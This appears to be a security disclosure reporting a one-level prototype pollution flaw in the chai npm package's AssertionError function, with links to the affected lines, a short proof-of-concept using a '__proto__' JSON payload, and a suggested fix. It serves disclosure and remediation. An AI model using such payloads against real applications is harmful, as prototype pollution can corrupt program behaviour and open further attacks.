Security vulnerability - Prototype pollution found in npm package - chai

[secdevlpr26]

A prototype pollution vulnerability is found in the Chai Npm package in the module - chai.js Here, one level of Object pollution is happening and not global pollution, but however, it is found that the affected function does not return anything.

The vulnerable functionality is exported here: https:/github.com/chaijs/chai/blob/529b8b527ba99454471ac67d6aebca9d96cb5dd9/chai.js#L9181 A vulnerable line of code (Object assignment) from outside parameters is happening here: https:/github.com/chaijs/chai/blob/529b8b527ba99454471ac67d6aebca9d96cb5dd9/chai.js#L9191 in "key" variable.

You can find the exploit code below:

const chai = require('chai');
const obj1 = JSON.parse('{"__proto__": {"toString": true}}');
console.log(obj1.toString());
try{
    const obj2 = chai.AssertionError("Error", obj1, 'ssfi');
    console.log({}.toString());  // One-level pollution only - returns the toString function
    console.log(obj2.toString());  // AssertionError does not return anything and is hence undefined, but polluted the object within the function
}
catch(e) {
    console.log(e.toString())
}

You can prevent this by adding any preventive measures like Object.preventExtensions, which I see is used but commented on in various parts of the code.

Kindly address this issue and feel free to get back if you have any queries. I have raised a GitHub issue for the same.